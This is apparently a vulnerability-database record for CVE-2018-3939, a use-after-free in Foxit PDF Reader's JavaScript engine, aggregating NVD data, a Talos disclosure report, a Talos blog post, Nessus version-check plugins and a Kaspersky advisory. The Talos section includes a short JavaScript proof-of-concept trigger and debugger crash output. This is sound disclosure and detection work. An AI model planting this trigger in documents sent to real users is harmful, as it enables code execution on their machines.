ID CVE-2018-3939 Type cve Reporter cve@mitre.org Modified 2018-10-05T16:04:00
Description
An exploitable use-after-free vulnerability exists in the JavaScript engine of Foxit Software's PDF Reader, version 9.1.0.5096. A specially crafted PDF document can trigger a previously freed object in memory to be reused, resulting in arbitrary code execution. An attacker needs to trick the user to open the malicious file to trigger this vulnerability. If the browser plugin extension is enabled, visiting a malicious site can also trigger the vulnerability.
{"id": "CVE-2018-3939", "bulletinFamily": "NVD", "title": "CVE-2018-3939", "description": "An exploitable use-after-free vulnerability exists in the JavaScript engine of Foxit Software's PDF Reader, version 9.1.0.5096. A specially crafted PDF document can trigger a previously freed object in memory to be reused, resulting in arbitrary code execution. An attacker needs to trick the user to open the malicious file to trigger this vulnerability. If the browser plugin extension is enabled, visiting a malicious site can also trigger the vulnerability.", "published": "2018-08-01T20:29:00", "modified": "2018-10-05T16:04:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-3939", "reporter": "cve@mitre.org", "references": ["https://www.foxitsoftware.com/support/security-bulletins.php", "https://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0606"], "cvelist": ["CVE-2018-3939"], "type": "cve", "lastseen": "2020-12-09T20:25:43", "edition": 5, "viewCount": 4, "enchantments": {"dependencies": {"references": [{"type": "talos", "idList": ["TALOS-2018-0606"]}, {"type": "nessus", "idList": ["FOXIT_READER_9_2.NASL", "FOXIT_PHANTOM_9_2.NASL", "FOXIT_READER_8_3_7.NASL"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E9BBE9708E075CD2AB0AFD049D8ED629"]}, {"type": "kaspersky", "idList": ["KLA11314"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310813156", "OPENVAS:1361412562310813263"]}], "modified": "2020-12-09T20:25:43", "rev": 2}, "score": {"value": 5.2, "vector": "NONE", "modified": "2020-12-09T20:25:43", "rev": 2}, "vulnersScore": 5.2}, "cpe": ["cpe:/a:foxitsoftware:foxit_reader:9.1.0.5096", "cpe:/a:foxitsoftware:phantompdf:9.1.0.5096"], "affectedSoftware": [{"cpeName": "foxitsoftware:foxit_reader", "name": "foxitsoftware foxit reader", "operator": "le", "version": "9.1.0.5096"}, {"cpeName": "foxitsoftware:phantompdf", "name": "foxitsoftware phantompdf", "operator": "le", "version": "9.1.0.5096"}], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cpe23": ["cpe:2.3:a:foxitsoftware:phantompdf:9.1.0.5096:*:*:*:*:*:*:*", "cpe:2.3:a:foxitsoftware:foxit_reader:9.1.0.5096:*:*:*:*:*:*:*"], "cwe": ["CWE-416"], "scheme": null, "affectedConfiguration": [{"cpeName": "microsoft:windows", "name": "microsoft windows", "operator": "eq", "version": "-"}], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:foxitsoftware:phantompdf:9.1.0.5096:*:*:*:*:*:*:*", "versionEndIncluding": "9.1.0.5096", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:foxitsoftware:foxit_reader:9.1.0.5096:*:*:*:*:*:*:*", "versionEndIncluding": "9.1.0.5096", "vulnerable": true}], "operator": "OR"}, {"cpe_match": [{"cpe23Uri": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "vulnerable": false}], "operator": "OR"}], "operator": "AND"}]}}
{"talos": [{"lastseen": "2020-07-01T21:25:09", "bulletinFamily": "info", "cvelist": ["CVE-2018-3939"], "description": "# Talos Vulnerability Report\n\n### TALOS-2018-0606\n\n## Foxit PDF Reader Javascript createTemplate nPage Remote Code Execution Vulnerability\n\n##### July 19, 2018\n\n##### CVE Number\n\nCVE-2018-3939 \n\n### Summary\n\nAn exploitable use-after-free vulnerability exists in the JavaScript engine of Foxit Software\u2019s PDF Reader, version 9.1.0.5096. A specially crafted PDF document can trigger a previously freed object in memory to be reused, resulting in arbitrary code execution. An attacker needs to trick the user to open the malicious file to trigger this vulnerability. If the browser plugin extension is enabled, visiting a malicious site can also trigger the vulnerability.\n\n### Tested Versions\n\nFoxit Software Foxit PDF Reader 9.1.0.5096.\n\n### Product URLs\n\n<https://www.foxitsoftware.com/products/pdf-reader/>\n\n### CVSSv3 Score\n\n8.0 - CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H\n\n### CWE\n\nCWE-416: Use After Free\n\n### Details\n\nFoxit PDF Reader is one of the most popular PDF document readers, and has a widespread user base. It aims to have feature parity with Adobe\u2019s Acrobat Reader. As a complete and feature-rich PDF reader, it supports JavaScript for interactive documents and dynamic forms. JavaScript support poses an additional attack surface.\n\nWhen executing embedded JavaScript code, a document can be closed, which essentially frees a lot of used objects, but the JavaScript can continue to execute. Invoking a method which keeps a stale reference to a now-freed object can lead to a use-after-free condition, which can be abused to execute arbitrary code.\n\nThis particular vulnerability lies in invoking the `createTemplate` method of the active document with a crafted object as argument, which can trigger a use-after-free condition, like in the following code:\n \n \n function main() {\n var a = {};\n a.toString = f;\n app.activeDocs[0].createTemplate(false,a);\n }\n \n function f() {\n app.activeDocs[0].closeDoc();\n }\n \n main();\n \n\nIn the above code, we create an object `a` and overload its `toString` method to be `f`. Then, when `createTemplate` is invoked, `toString` of the second argument is called, effectively closing the document and freeing a number of objects. When `createTemplate` continues execution, it reuses a stale reference of a freed object, causing a crash.\n\nOpening this proof-of-concept PDF document in Foxit PDF Reader with PageHeap enabled results in the following crash:\n \n \n (1668.12d0): Access violation - code c0000005 (first chance)\n First chance exceptions are reported before any exception handling.\n This exception may be expected and handled.\n eax=00000001 ebx=11f49ff8 ecx=0ff90da8 edx=075d1078 esi=12201ef0 edi=002be6f8\n eip=018184c3 esp=002be5d0 ebp=002be678 iopl=0 nv up ei pl nz na po nc\n cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210202\n FoxitReader!CryptVerifyMessageSignature+0x90c13:\n 018184c3 8b11 mov edx,dword ptr [ecx] ds:0023:0ff90da8=????????\n 0:000> !heap -p -a ecx\n address 0ff90da8 found in\n _DPH_HEAP_ROOT @ 75d1000\n in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)\n ffc1c30: ff90000 2000\n 6b0f90b2 verifier!AVrfDebugPageHeapFree+0x000000c2\n 774969cc ntdll!RtlDebugFreeHeap+0x0000002f\n 77459e07 ntdll!RtlpFreeHeap+0x0000005d\n 774263a6 ntdll!RtlFreeHeap+0x00000142\n 7565c614 kernel32!HeapFree+0x00000014\n 02c2df1b FoxitReader!CryptVerifyMessageSignature+0x014a666b\n 011208bf FoxitReader+0x000d08bf\n 011228a8 FoxitReader+0x000d28a8\n 0126965e FoxitReader+0x0021965e\n 0126942b FoxitReader+0x0021942b\n 0127842a FoxitReader+0x0022842a\n 01262fd7 FoxitReader+0x00212fd7\n 01262df8 FoxitReader+0x00212df8\n 02a851ec FoxitReader!CryptVerifyMessageSignature+0x012fd93c\n 02a890ef FoxitReader!CryptVerifyMessageSignature+0x0130183f\n 02a8917e FoxitReader!CryptVerifyMessageSignature+0x013018ce\n 7724c4b7 USER32!InternalCallWinProc+0x00000023\n 7724c5b7 USER32!UserCallWinProcCheckWow+0x0000014b\n 77245264 USER32!SendMessageWorker+0x000004d0\n 77245552 USER32!SendMessageW+0x0000007c\n 012609f5 FoxitReader+0x002109f5\n 02a8ae65 FoxitReader!CryptVerifyMessageSignature+0x013035b5\n 02a851ec FoxitReader!CryptVerifyMessageSignature+0x012fd93c\n 02a890ef FoxitReader!CryptVerifyMessageSignature+0x0130183f\n 02a8917e FoxitReader!CryptVerifyMessageSignature+0x013018ce\n 7724c4b7 USER32!InternalCallWinProc+0x00000023\n 7724c5b7 USER32!UserCallWinProcCheckWow+0x0000014b\n 77245264 USER32!SendMessageWorker+0x000004d0\n 77245552 USER32!SendMessageW+0x0000007c\n 0118bee7 FoxitReader+0x0013bee7\n 017f373e FoxitReader!CryptVerifyMessageSignature+0x0006be8e\n 018019e9 FoxitReader!CryptVerifyMessageSignature+0x0007a139\n \n \n 0:000> u\n FoxitReader!CryptVerifyMessageSignature+0x90c13:\n 018184c3 8b11 mov edx,dword ptr [ecx]\n 018184c5 8b4204 mov eax,dword ptr [edx+4]\n 018184c8 83c404 add esp,4\n 018184cb ffd0 call eax\n 018184cd 8bf8 mov edi,eax\n 018184cf 85ff test edi,edi\n 018184d1 0f8427ffffff je FoxitReader!CryptVerifyMessageSignature+0x90b4e (018183fe)\n 018184d7 8b5f5c mov ebx,dword ptr [edi+5Ch]\n 0:000> k 4\n # ChildEBP RetAddr \n WARNING: Stack unwind information not available. Following frames may be wrong.\n 00 002be678 01819099 FoxitReader!CryptVerifyMessageSignature+0x90c13\n 01 002be6d4 013d1578 FoxitReader!CryptVerifyMessageSignature+0x917e9\n 02 002be71c 028d9b2e FoxitReader+0x381578\n 03 002be750 028d1946 FoxitReader!CryptVerifyMessageSignature+0x115227e\n \n\nAnalyzing the heap state clearly shows that `ecx` points into an unallocated freed memory region. And, if we take a look at the code immediately following the point of crash, we can see `edx` being used as a vtable pointer, ultimately leading to `call` instruction with controllable operand in `eax`. Since the contents of memory pointed to by `ecx` can easily be controlled, this leads to relatively straightforward conditions for arbitrary code execution.\n\n### Timeline\n\n2018-06-05 - Vendor Disclosure \n2018-07-19 - Public Release\n\n##### Credit\n\nDiscovered by Aleksandar Nikolic of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2018-0559\n\nPrevious Report\n\nTALOS-2018-0588\n", "edition": 5, "modified": "2018-07-19T00:00:00", "published": "2018-07-19T00:00:00", "id": "TALOS-2018-0606", "href": "http://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0606", "title": "Foxit PDF Reader Javascript createTemplate nPage Remote Code Execution Vulnerability", "type": "talos", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "talosblog": [{"lastseen": "2018-07-19T18:41:04", "bulletinFamily": "blog", "cvelist": ["CVE-2018-3924", "CVE-2018-3939"], "description": "## Overview\n\n_Discovered by Aleksandar Nikolic of Cisco Talos._ \n_ \n_Talos is disclosing a pair of vulnerabilities in Foxit PDF Reader. Foxit PDF Reader is a popular free program for viewing, creating, and editing PDF documents. It is commonly used as an alternative to Adobe Acrobat Reader and has a widely used browser plugin available. \n \n\n\n## TALOS-2018-0588\n\n \n \n\n\nTALOS-2018-0588 / CVE-2018-3924 is an exploitable user-after-free vulnerability that exists in the JavaScript engine of Foxit's PDF Reader. As a complete feature-rich PDF reader Foxit supports JavaScript for interactive documents and dynamic forms. When executing embedded JavaScript code a document can be cloned, which frees a lot of used objects, but the JavaScript can continue to execute, potentially leading to a user-after-free condition. This particular vulnerability lies in invoking the 'mailForm' method of the active document resulting in arbitrary code execution. \n \nA specially crafted PDF file could trigger this vulnerability. There are a couple of different ways an adversary could leverage this attack including tricking a user to opening a malicious PDF or, if the browser plugin is enabled, simply viewing the document on the Internet could result in exploitation. Full details of the vulnerability can be found [here](<http://www.talosintelligence.com/reports/TALOS-2018-0588>). \n \n\n\n## TALOS-2018-0606\n\n \n\n\nTALOS-2018-0606 / CVE-2018-3939 is an exploitable use-after-free vulnerability found in the Javascript engine that can result in remote code execution. As a complete feature-rich PDF reader Foxit supports JavaScript for interactive documents and dynamic forms. When executing embedded JavaScript code a document can be closed, which frees a lot of used objects, but the JavaScript can continue to execute, potentially leading to a user-after-free condition. This particular vulnerability lies in invoking the 'createTemplate' method of the active document resulting in arbitrary code execution. \n \nA specially crafted PDF file could trigger this vulnerability. There are a couple of different ways an adversary could leverage this attack including tricking a user to opening a malicious PDF or, if the browser plugin is enabled, simply viewing the document on the Internet could result in exploitation. Full details of the vulnerability can be found [here](<http://www.talosintelligence.com/reports/TALOS-2018-0606>). \n\n\n[](<https://www.foxitsoftware.com/pdf-reader/>)\n\n \n\n\n## Coverage\n\n \n\n\nThe following Snort rules will detect exploitation attempts. Note that additional rules may be released at a future date, and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org. \n \nSnort Rule: 46457-46458, 46864-46865 \n \nFor other vulnerabilities Talos has disclosed, please refer to our Vulnerability Report Portal: <http://www.talosintelligence.com/vulnerability-reports/> \n \nTo review our Vulnerability Disclosure Policy, please visit this site: \n<http://www.cisco.com/c/en/us/about/security-center/vendor-vulnerability-policy.html>", "modified": "2018-07-19T18:09:40", "published": "2018-07-19T10:52:00", "id": "TALOSBLOG:E9BBE9708E075CD2AB0AFD049D8ED629", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/PBHU1FP1UYk/vuln-spotlight-foxit-rce.html", "type": "talosblog", "title": "Vulnerability Spotlight: Foxit PDF Reader JavaScript Remote Code Execution Vulns", "cvss": {"score": 0.0, "vector": "NONE"}}], "nessus": [{"lastseen": "2020-04-30T08:25:36", "description": "The version of Foxit Reader installed on the remote Windows host is\nprior to 8.3.7. It is, therefore, affected by multiple\nvulnerabilities.", "edition": 15, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-08-22T00:00:00", "title": "Foxit Reader < 8.3.7 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-3939", "CVE-2018-3924"], "modified": "2018-08-22T00:00:00", "cpe": ["cpe:/a:foxitsoftware:foxit_reader"], "id": "FOXIT_READER_8_3_7.NASL", "href": "https://www.tenable.com/plugins/nessus/112059", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(112059);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/04/27\");\n\n script_cve_id(\"CVE-2018-3924\", \"CVE-2018-3939\");\n\n script_name(english:\"Foxit Reader < 8.3.7 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of Foxit Reader.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A PDF viewer installed on the remote Windows host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Foxit Reader installed on the remote Windows host is\nprior to 8.3.7. It is, therefore, affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.foxitsoftware.com/support/security-bulletins.php\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Foxit Reader version 8.3.7 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-3939\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/08/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:foxitsoftware:foxit_reader\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"foxit_reader_installed.nasl\");\n script_require_keys(\"installed_sw/Foxit Reader\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp = 'Foxit Reader';\n\napp_info = vcf::get_app_info(app:app, win_local:TRUE);\n\nconstraints = [{\n 'min_version' : '8.0',\n 'max_version' : '8.3.6.35572',\n 'fixed_version' : '8.3.7'\n }];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T02:35:02", "description": "The version of Foxit Reader installed on the remote Windows host is\nprior to 9.2. It is, therefore, affected by multiple vulnerabilities.", "edition": 24, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-07-27T00:00:00", "title": "Foxit Reader < 9.2 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-3939", "CVE-2018-14442", "CVE-2018-3924"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:foxitsoftware:foxit_reader"], "id": "FOXIT_READER_9_2.NASL", "href": "https://www.tenable.com/plugins/nessus/111377", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111377);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/11/04\");\n\n script_cve_id(\"CVE-2018-3924\", \"CVE-2018-3939\", \"CVE-2018-14442\");\n\n script_name(english:\"Foxit Reader < 9.2 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of Foxit Reader.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A PDF viewer installed on the remote Windows host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Foxit Reader installed on the remote Windows host is\nprior to 9.2. It is, therefore, affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.foxitsoftware.com/support/security-bulletins.php\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Foxit Reader version 9.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-14442\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/07/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:foxitsoftware:foxit_reader\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"foxit_reader_installed.nasl\");\n script_require_keys(\"installed_sw/Foxit Reader\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp = 'Foxit Reader';\n\napp_info = vcf::get_app_info(app:app, win_local:TRUE);\n\nconstraints = [{\n 'min_version' : '9.0',\n 'max_version' : '9.1.0.5096',\n 'fixed_version' : '9.2'\n }];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T02:35:00", "description": "According to its version, the Foxit PhantomPDF application (formally\nknown as Phantom) installed on the remote Windows host is prior to\n9.2. It is, therefore, affected by multiple vulnerabilities.", "edition": 24, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-07-27T00:00:00", "title": "Foxit PhantomPDF < 9.2 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-3939", "CVE-2018-14442", "CVE-2018-3924"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:foxitsoftware:phantompdf", "cpe:/a:foxitsoftware:phantom"], "id": "FOXIT_PHANTOM_9_2.NASL", "href": "https://www.tenable.com/plugins/nessus/111376", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111376);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/11/04\");\n\n script_cve_id(\"CVE-2018-3924\", \"CVE-2018-3939\", \"CVE-2018-14442\");\n\n script_name(english:\"Foxit PhantomPDF < 9.2 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of Foxit PhantomPDF.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A PDF toolkit installed on the remote Windows host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the Foxit PhantomPDF application (formally\nknown as Phantom) installed on the remote Windows host is prior to\n9.2. It is, therefore, affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.foxitsoftware.com/support/security-bulletins.php\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Foxit PhantomPDF version 9.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-14442\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/07/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:foxitsoftware:phantom\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:foxitsoftware:phantompdf\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"foxit_phantom_installed.nasl\");\n script_require_keys(\"installed_sw/FoxitPhantomPDF\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp = 'FoxitPhantomPDF';\n\napp_info = vcf::get_app_info(app:app, win_local:TRUE);\n\nconstraints = [{\n 'min_version' : '9.0',\n 'max_version' : '9.1.0.5096',\n 'fixed_version' : '9.2'\n }];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "kaspersky": [{"lastseen": "2020-09-02T11:54:57", "bulletinFamily": "info", "cvelist": ["CVE-2018-14302", "CVE-2018-14281", "CVE-2018-14283", "CVE-2018-11621", "CVE-2018-14264", "CVE-2018-14306", "CVE-2018-14276", "CVE-2018-14246", "CVE-2018-14272", "CVE-2018-14305", "CVE-2018-14290", "CVE-2018-14271", "CVE-2018-14243", "CVE-2018-14270", "CVE-2018-14241", "CVE-2018-14275", "CVE-2018-14304", "CVE-2018-14244", "CVE-2018-14258", "CVE-2018-14265", "CVE-2018-14253", "CVE-2018-14309", "CVE-2018-14291", "CVE-2018-14286", "CVE-2018-14257", "CVE-2018-14310", "CVE-2018-14254", "CVE-2018-14279", "CVE-2018-14262", "CVE-2018-14301", "CVE-2018-3939", "CVE-2018-14274", "CVE-2018-14285", "CVE-2018-14260", "CVE-2018-14278", "CVE-2018-14307", "CVE-2018-14293", "CVE-2018-14266", "CVE-2018-14315", "CVE-2018-14300", "CVE-2018-14294", "CVE-2018-14317", "CVE-2018-14312", "CVE-2018-14263", "CVE-2018-14297", "CVE-2018-14287", "CVE-2018-14242", "CVE-2018-14308", "CVE-2018-11617", "CVE-2018-14314", "CVE-2018-14249", "CVE-2018-14277", "CVE-2018-14261", "CVE-2018-14245", "CVE-2018-14273", "CVE-2018-14248", "CVE-2018-14316", "CVE-2018-14311", "CVE-2018-14295", "CVE-2018-14292", "CVE-2018-14267", "CVE-2018-14247", "CVE-2018-11622", "CVE-2018-14259", "CVE-2018-14313", "CVE-2018-14296", "CVE-2018-14255", "CVE-2018-14268", "CVE-2018-14288", "CVE-2018-14298", "CVE-2018-11620", "CVE-2018-11619", "CVE-2018-14256", "CVE-2018-14269", "CVE-2018-11618", "CVE-2018-14284", "CVE-2018-14299", "CVE-2018-14289", "CVE-2018-11623", "CVE-2018-3924", "CVE-2018-14280", "CVE-2018-14252", "CVE-2018-14303", "CVE-2018-14282", "CVE-2018-14251", "CVE-2018-14250"], "description": "### *Detect date*:\n07/19/2018\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities were found in Foxit Reader. Malicious users can exploit these vulnerabilities to execute arbitrary code and obtain sensitive information.\n\n### *Affected products*:\nFoxit Reader earlier than 9.2.0.9097 \nFoxit PhantomPDF earlier than 9.2.0.9097\n\n### *Solution*:\nUpdate to the latest version \n[Download Foxit Reader](<https://www.foxitsoftware.com/downloads/#Foxit-Reader>) \n[Download Foxit PhantomPDF](<https://www.foxitsoftware.com/downloads/#Foxit-PhantomPDF-Business>)\n\n### *Original advisories*:\n[Security updates available in Foxit Reader 9.2 and Foxit PhantomPDF 9.2](<https://www.foxitsoftware.com/support/security-bulletins.php>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Foxit Reader](<https://threats.kaspersky.com/en/product/Foxit-Reader/>)\n\n### *CVE-IDS*:\n[CVE-2018-11617](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11617>)6.8High \n[CVE-2018-11618](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11618>)6.8High \n[CVE-2018-11619](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11619>)6.8High \n[CVE-2018-11620](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11620>)4.3Warning \n[CVE-2018-11621](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11621>)4.3Warning \n[CVE-2018-11622](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11622>)6.8High \n[CVE-2018-11623](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11623>)6.8High \n[CVE-2018-14241](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14241>)6.8High \n[CVE-2018-14242](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14242>)6.8High \n[CVE-2018-14243](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14243>)6.8High \n[CVE-2018-14244](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14244>)6.8High \n[CVE-2018-14245](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14245>)6.8High \n[CVE-2018-14246](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14246>)6.8High \n[CVE-2018-14247](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14247>)6.8High \n[CVE-2018-14248](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14248>)6.8High \n[CVE-2018-14249](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14249>)6.8High \n[CVE-2018-14250](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14250>)6.8High \n[CVE-2018-14251](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14251>)6.8High \n[CVE-2018-14252](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14252>)6.8High \n[CVE-2018-14253](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14253>)6.8High \n[CVE-2018-14254](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14254>)6.8High \n[CVE-2018-14255](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14255>)6.8High \n[CVE-2018-14256](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14256>)6.8High \n[CVE-2018-14257](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14257>)6.8High 